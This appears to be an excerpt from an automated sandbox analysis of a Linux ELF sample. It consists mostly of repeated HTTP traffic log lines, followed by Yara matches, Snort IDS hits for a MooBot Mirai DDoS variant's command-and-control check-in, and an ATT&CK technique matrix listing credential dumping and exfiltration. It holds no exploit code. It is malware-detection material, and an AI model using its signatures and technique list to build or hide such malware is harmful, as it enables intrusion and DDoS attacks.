                      Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44670 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45300 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34586 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33640 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57322 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43764 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33132 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58174 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54822 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46190 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41892 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56990 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59492 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46300 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58176 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49430 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43320 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57274 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52494 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41472 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39246 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55596 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38480 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59306 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59976 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47604 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40396 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36848 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43644 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54762 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44942 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43180 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41910 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34194 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58744 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52160 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54950 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56302 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55632 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38644 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39896 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56584 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45864 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39384 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51272 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41276 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51850 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55664 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54276 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59668 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37880 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41154 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49580 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53414 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36134 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60812 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43704 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36764 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49376 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60992 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38450 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48346 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60696 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34958 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46826 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40716 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53346 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54356 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60454 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51668 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44232 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57442 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51144 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43456 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39756 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57654 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44460 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46926 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48094 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46008 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47510 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60312 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36542 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54818 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39506 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43338 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57044 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41262 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51844 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38516 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52084 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51022 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52518 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42462 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52616 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47918 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36990 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60046 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34800 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59170 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56002 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58484 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55504 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60838 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59528 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46882 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36180 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37552 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38548 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53120 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37830 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52708 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34452 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58576 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46100 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36208 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44754 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60644 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47408 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56444 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43332 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43344 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56896 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35268 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37482 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38402 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35550 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33732 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34146 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33442 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48960 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53578 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38920 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33088 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38972 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37000 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 37215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34406 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39612 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57640 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34334 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58652 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42014 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58530 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54370 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39626 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36594 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59762 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47286 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45110 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56768 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45592 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34590 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41638 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60318 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36408 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49614 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36554 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51814 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59174 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58254 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53492 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38836 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56632 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53416 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60362 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45968 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54996 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60396 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35356 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56574 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34670 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48990 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60422 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39088 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39266 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34342 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39816 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43378 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41408 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39110 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41744 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38320 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58646 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59138 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33958 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34010 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56206 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51416 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51258 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37558 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38754 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47044 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56298 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36626 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34252 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37778 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53366 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60628 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50716 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37750 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58990 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55798 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36308 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42874 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55464 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33044 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53358 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40100 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35064 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47144 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47738 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57066 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37794 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46444 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56988 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44354 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53984 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44802 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58726 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55888 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33240 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 38068 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44566 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41586 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36880 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51202 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59748 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58360 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34060 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54434 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47280 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45142 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53128 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53676 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59962 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48432 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42316 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36194 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34866 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37610 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49518 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49012 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57524 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34032 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56214 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48982 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44264 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33598 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53484 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56096 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41072 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47142 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54342 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 39728 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48742 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45172 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44604 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44792 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33704 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43674 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40326 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34276 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43580 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59544 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34924 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35748 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57166 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46490 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60632 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 47046 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60316 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35356 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44664 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44510 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60232 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51362 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57286 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54240 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48746 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49074 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42362 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 35510 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45446 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40926 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42884 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42680 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43194 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40506 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43232 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 36152 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48504 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46836 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37584 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 52630 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45306 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45780 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41148 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 41162 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49480 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56914 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44972 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 45576 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54698 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53970 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 34740 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 48352 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60994 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53972 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51074 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 37510 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51636 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 42232 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32796 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46484 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51504 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59478 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59484 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50740 -> 52869

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 1gx339YsKN.elf, type: SAMPLE
                      Source: Yara matchFile source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 1gx339YsKN.elf, type: SAMPLE
                      Source: Yara matchFile source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1gx339YsKN.elf PID: 5540, type: MEMORYSTR
                      Source: Yara matchFile source: 1gx339YsKN.elf, type: SAMPLE
                      Source: Yara matchFile source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1gx339YsKN.elf PID: 5540, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                      Source: Yara matchFile source: 1gx339YsKN.elf, type: SAMPLE
                      Source: Yara matchFile source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 1gx339YsKN.elf, type: SAMPLE
                      Source: Yara matchFile source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1gx339YsKN.elf PID: 5540, type: MEMORYSTR
                      Source: Yara matchFile source: 1gx339YsKN.elf, type: SAMPLE
                      Source: Yara matchFile source: 5540.1.0000000000400000.0000000000421000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1gx339YsKN.elf PID: 5540, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts1
                      Command and Scripting Interpreter
                      1
                      Scripting
                      Path InterceptionDirect Volume Access1
                      OS Credential Dumping
                      System Service DiscoveryRemote ServicesData from Local System11
                      Non-Standard Port
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
                      Non-Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
                      Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
                      Ingress Tool Transfer
                      Traffic DuplicationData Destruction
                      No configs have been found
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
